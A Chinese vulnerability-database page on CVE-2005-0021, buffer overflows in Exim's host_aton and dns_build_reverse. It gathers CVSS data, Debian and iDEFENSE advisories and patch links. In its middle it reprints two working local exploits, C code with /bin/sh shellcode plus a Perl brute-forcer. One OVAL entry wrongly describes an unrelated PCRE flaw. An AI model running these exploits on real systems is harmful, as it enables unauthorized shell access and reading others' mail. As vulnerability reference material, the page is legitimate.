CVE-2005-0021
CVSS7.2
发布时间 :2005-05-02 00:00:00
修订时间 :2010-08-21 00:25:22
NMCOEPS    

[原文]Multiple buffer overflows in Exim before 4.43 may allow attackers to execute arbitrary code via (1) an IPv6 address with more than 8 components, as demonstrated using the -be command line option, which triggers an overflow in the host_aton function, or (2) the -bh command line option or dnsdb PTR lookup, which triggers an overflow in the dns_build_reverse function.


[CNNVD]Exim host_aton本地缓冲区溢出漏洞(CNNVD-200505-703)

        Exim host_aton函数中存在一个边界检查不充分问题,本地攻击者可以利用这个漏洞对程序进行缓冲区溢出攻击,可能以进程权限执行任意指令。
        host_aton函数没有充分过滤存储在固定大小数组中的元素个数,而这个元素来自用户控制的字符串,并由命令行选项传递,精心构建字符串数据,可能以进程权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:university_of_cambridge:exim:4.40
cpe:/a:university_of_cambridge:exim:4.41
cpe:/a:university_of_cambridge:exim:4.42

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:10347Perl-Compatible Regular Expression (PCRE) library before 7.3 allows context-dependent attackers to cause a denial of service (crash) and pos...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0021
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0021
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-703
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/132992
(PATCH)  CERT-VN  VU#132992
http://www.redhat.com/support/errata/RHSA-2005-025.html
(PATCH)  REDHAT  RHSA-2005:025
http://www.idefense.com/application/poi/display?id=183&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050114 Exim dns_buld_reverse() Buffer Overflow Vulnerability
http://www.idefense.com/application/poi/display?id=179&type=vulnerabilities
(VENDOR_ADVISORY)  IDEFENSE  20050107 Exim host_aton() Buffer Overflow Vulnerability
http://www.exim.org/mail-archives/exim-users/Week-of-Mon-20050103/msg00028.html
(UNKNOWN)  MLIST  [exim] 20050104 2 smallish security issues
http://www.debian.org/security/2005/dsa-637
(VENDOR_ADVISORY)  DEBIAN  DSA-637
http://www.debian.org/security/2005/dsa-635
(VENDOR_ADVISORY)  DEBIAN  DSA-635
http://security.gentoo.org/glsa/glsa-200501-23.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200501-23
http://ftp6.us.freebsd.org/pub/mail/exim/ChangeLogs/ChangeLog-4.44
(UNKNOWN)  CONFIRM  http://ftp6.us.freebsd.org/pub/mail/exim/ChangeLogs/ChangeLog-4.44

- 漏洞信息

Exim host_aton本地缓冲区溢出漏洞
高危 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
本地  
        Exim host_aton函数中存在一个边界检查不充分问题,本地攻击者可以利用这个漏洞对程序进行缓冲区溢出攻击,可能以进程权限执行任意指令。
        host_aton函数没有充分过滤存储在固定大小数组中的元素个数,而这个元素来自用户控制的字符串,并由命令行选项传递,精心构建字符串数据,可能以进程权限执行任意指令。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html

- 漏洞信息 (756)

Exim <= 4.41 dns_build_reverse Local Exploit PoC (EDBID:756)
linux local
2005-01-15 Verified
0 Rafael Carrasco
N/A [点击下载]
/*
This proof-of-concept demonstrates the existence of the vulnerability
reported by iDEFENSE (iDEFENSE Security Advisory 01.14.05).
It has been tested against exim-4.41 under Debian GNU/Linux.
Note that setuid () is not included in the shellcode to avoid
script-kidding.
My RET is 0xbffffae4, but fb.pl can brute-force it for you.

-----------
Brute Force fb.pl:
-----------

#!/usr/bin/perl

$cnt = 0xbffffa10;

while (1) {
   $hex = sprintf ("0x%x", $cnt);
   $res = system ("./exploit $hex");
   printf "$hex : $res\n";
   $cnt += 4;
}

---------
exploit.c:
---------
*/

#define NOP 0x90
#define TAMBUF 368
#define INIC_SH 20
#include <stdlib.h>

int main (int argc, char **argv) {

   static char shellcode[]=
   "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
   "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
   "\x2f\x73\x68\x58";

   char buffer [TAMBUF + 1];
   char cadena [TAMBUF + 5];
   int cont;
   unsigned long ret = strtoul (argv[1], NULL, 16);

   for (cont = 0; cont < TAMBUF / 4; cont++)
           *( (long *) buffer + cont) = ret;

   for (cont = 0; cont < strlen (shellcode); cont++)
           buffer [cont + INIC_SH] = shellcode [cont];

   for (cont = 0; cont < INIC_SH; cont++)
           buffer [cont] = NOP;

   buffer [TAMBUF] = 0;
   printf ("RET = 0x%x\n", ret);
   strcpy (cadena, "::%A");
   strcat (cadena, buffer);
       execl ("/usr/sbin/exim", "./exim", "-bh", cadena, (char *) 0);
}

// milw0rm.com [2005-01-15]
		

- 漏洞信息 (1009)

Exim <= 4.41 dns_build_reverse Local Exploit (EDBID:1009)
linux local
2005-05-25 Verified
0 Plugger
N/A [点击下载]
/* 
 * ripped straight off iDEFENSE advisory - so lazy I just picked
 * up GDB... bored on a weeknight :(
 * 
 * nothing to write home to mother about due to the fact that
 * you need a local user account on a server and all you
 * get is to read other people's emails ....
 * 
 * not even my own shellcode. aleph1 shellcode - cut and paste job 
 * with nops to pad.
 *
 * Regards,
 * Plugger aka Tony Lockett
 *
 * 
 * 
 */

char bomb[288]=

/* the gear from iDEFENSE */
"::%A:::::::::::::::::"                             /* 21 bytes  */
                                                    /* --------  */
/* NOPS for padding */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90"                                          /* 218 bytes */
                                                    /* --------- */
/* actual code courtesy Aleph1 */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"  /* 12 bytes  */
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"  /* 12 bytes  */
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"              /* 9 bytes   */
"\xe8\xdc\xff\xff\xff/bin/sh"                       /* 12 bytes  */

/* where EIP should point */
"\xf4\xf2\xff\xbf";                                 /*  4 bytes  */
                                                    /* --------  */
                                                    /* 49 bytes  */
                                                    /* --------  */
                                                    /* 288 bytes */
                                                    /* ========= */
main()
{
  char *exim[4];
  exim[0] = "/usr/exim/bin/exim";
  exim[1] = "-bh";
  exim[2] = bomb;
  exim[3] = 0x0;
  printf("Firing up exim - cross your fingers for shell!\n");
  execve(exim[0],exim,0x0);
  return;
}

// milw0rm.com [2005-05-25]
		

- 漏洞信息 (F35726)

dsa-637.txt (PacketStormID:F35726)
2005-01-16 00:00:00
 
advisory,overflow,arbitrary
linux,debian
CVE-2005-0021
[点击下载]

Debian Security Advisory 637-1 - Philip Hazel announced a buffer overflow in the host_aton function in exim-tls, the SSL-enabled version of the default mail-tranport-agent in Debian, which can lead to the execution of arbitrary code via an illegal IPv6 address.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 637-1                     security@debian.org
http://www.debian.org/security/                             Martin Schulze
January 13th, 2005                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : exim-tls
Vulnerability  : buffer overflow
Problem-Type   : remote
Debian-specific: no
CVE ID         : CAN-2005-0021
Debian Bug     : 289046

Philip Hazel announced a buffer overflow in the host_aton function in
exim-tls, the SSL-enabled version of the default mail-tranport-agent
in Debian, which can lead to the execution of arbitrary code via an
illegal IPv6 address.

For the stable distribution (woody) this problem has been fixed in
version 3.35-3woody3.

In the unstable distribution (sid) this package does not exist
anymore.

We recommend that you upgrade your exim-tls package.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3.dsc
      Size/MD5 checksum:      677 059e83c496e959d01bcca0a11637b017
    http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3.diff.gz
      Size/MD5 checksum:    80492 90d594f60ae815a780faa5f9c9d1859d
    http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35.orig.tar.gz
      Size/MD5 checksum:  1271057 42d362e40a21bd7ffc298f92c8bd986a

  Alpha architecture:

    http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_alpha.deb
      Size/MD5 checksum:   873682 935e1dddb27a713d562b905c2951dea7

  ARM architecture:

    http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_arm.deb
      Size/MD5 checksum:   784148 c97ded116303fe5ee1c4a9f741350c58

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_i386.deb
      Size/MD5 checksum:   759442 1477e25fe953ee209ec86a67a59306ba

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_ia64.deb
      Size/MD5 checksum:   974058 74cd3707971105a75398a0ce46e4bb80

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_hppa.deb
      Size/MD5 checksum:   814316 56d73dab6e0bbd4df6068c5f9f065491

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_m68k.deb
      Size/MD5 checksum:   736730 ba35f1bd8dcfaf6ef9f35aded9176cab

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_mips.deb
      Size/MD5 checksum:   824408 0f8af4bf6f39d1dbb10e05e5717e3115

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_mipsel.deb
      Size/MD5 checksum:   825160 abfc0dc6c75fc7fafba89f6673bd1913

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_powerpc.deb
      Size/MD5 checksum:   792574 f8c3a2d72890f766a72a6ddc39f2ea31

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_s390.deb
      Size/MD5 checksum:   779236 aca9521a7b347d291e158a919cca0ed5

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/e/exim-tls/exim-tls_3.35-3woody3_sparc.deb
      Size/MD5 checksum:   782800 5e3a9478dc77a0943ce0c41611973c95


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFB5iL8W5ql+IAeqTIRAn1eAJwMSHPcsyO1ErWCQmEPMsxFf/PQXwCfetsH
suc9pTv73NqZRAKBio6LQz0=
=toCp
-----END PGP SIGNATURE-----

    

- 漏洞信息 (F35647)

IDEF0725.txt (PacketStormID:F35647)
2005-01-11 00:00:00
 
advisory,overflow,arbitrary,local
CVE-2005-0021
[点击下载]

iDEFENSE Security Advisory IDEF0725 - Local exploitation of a buffer overflow vulnerability in Exim 4.41 may allow execution of arbitrary commands with elevated privileges. The problem specifically exists in the host_aton function. The function fails to check the number of elements it stores in a fixed size array. The elements come from a user-controlled string and are passed into the program from a command line option.

Exim host_aton() Buffer Overflow Vulnerability

iDEFENSE Security Advisory [IDEF0725]
http://www.idefense.com/application/poi/display?type=vulnerabilities
January 07, 2005

I. BACKGROUND

Exim is a message transfer agent developed for use on Unix systems. More

information is available at: 

	http://www.exim.org/

II. DESCRIPTION

Local exploitation of a buffer overflow vulnerability in Exim 4.41 may 
allow execution of arbitrary commands with elevated privileges.

The problem specifically exists in the host_aton function. The function 
fails to check the number of elements it stores in a fixed size array. 
The elements come from a user-controlled string and are passed into the 
program from a command line option.

III. ANALYSIS

Exploitation of this vulnerability will give an attacker access to the 
mailer uid. The exim mailer is setuid root, but drops privileges before 
the vulnerable code is reached. Having the mailer uid may allow access 
to sensitive information in e-mail messages or possibly further 
elevation.

IV. DETECTION

Exim versions 4.40 and 4.41 have been confirmed vulnerable. The source 
code for version 4.42 suggests that it is also vulnerable. It is 
suspected that previous versions are vulnerable.

V. WORKAROUND

iDEFENSE is currently unaware of any effective workarounds for this 
vulnerability.

VI. VENDOR RESPONSE

A patch for Exim release 4.43 which addresses this vulnerability is
available at:

   http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html

The patch will be incorporated into a future Exim release (4.50).

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
names CAN-2005-0021 to these issues. This is a candidate for inclusion
in the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/23/2004  Initial vendor notification
12/29/2004  Initial vendor response
01/07/2005  Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

X. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
    

- 漏洞信息

12726
Exim -be Command Line Option host_aton Function Local Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Unknown

- 漏洞描述

A remote overflow exists in Exim. Exim fails to properly check input to host_aton() resulting in a buffer overflow. With a specially crafted request of an IPv6 address with more than 8 components, an attacker can cause execution of arbitrary code resulting in a loss of integrity.

- 时间线

2005-01-06 2004-12-23
Unknow Unknow

- 解决方案

Upgrade to version 4.44 or higher, as it has been reported to fix this vulnerability. In addition, Exim has released a patch for some older versions.

- 相关参考

- 漏洞作者

- 漏洞信息

Exim IP Address Command Line Argument Local Buffer Overflow Vulnerability
Boundary Condition Error 12268
No Yes
2005-01-14 12:00:00 2009-07-12 09:27:00
The individual or individuals responsible for the discovery of this issue wish to remain anonymous.

- 受影响的程序版本

University of Cambridge Exim 4.43
University of Cambridge Exim 4.42
University of Cambridge Exim 4.41
University of Cambridge Exim 4.40
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
ALT Linux ALT Linux Junior 2.3
ALT Linux ALT Linux Compact 2.3

- 漏洞讨论

A local buffer overflow vulnerability triggered by an excessively long command line argument affects Exim. This issue is due to a failure of the application to validate the length of user-supplied data prior to attempting to store it in process buffers.

An attacker may leverage this issue to execute arbitrary code with the privileges of the affected mailer application. As the application is a setuid application, it is possible that further privilege escalation may occur.

- 漏洞利用

The following proof of concept exploits and have been made available by Rafael San Miguel Carrasco &lt;smcsoc@yahoo.es&gt; (eximExploit.tar.gz), pi3ki31ny (p_exim.c), and Tony Lockett "plugger" &lt;plug@internode.on.net&gt; (exim-exploit.c).

- 解决方案

The University of Cambridge has reportedly released a patch dealing with this issue, although this is not confirmed. Users are advised to contact the vendor for more information.

SuSE Linux has released a security summary report (SUSE-SR:2005:002) that contains fixes to address this and other vulnerabilities. Customers are advised to peruse the referenced advisory for further information regarding obtaining and applying appropriate updates.

ALT Linux has released updates dealing with this and other issues. Please see the reference section for more information.


University of Cambridge Exim 4.42

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站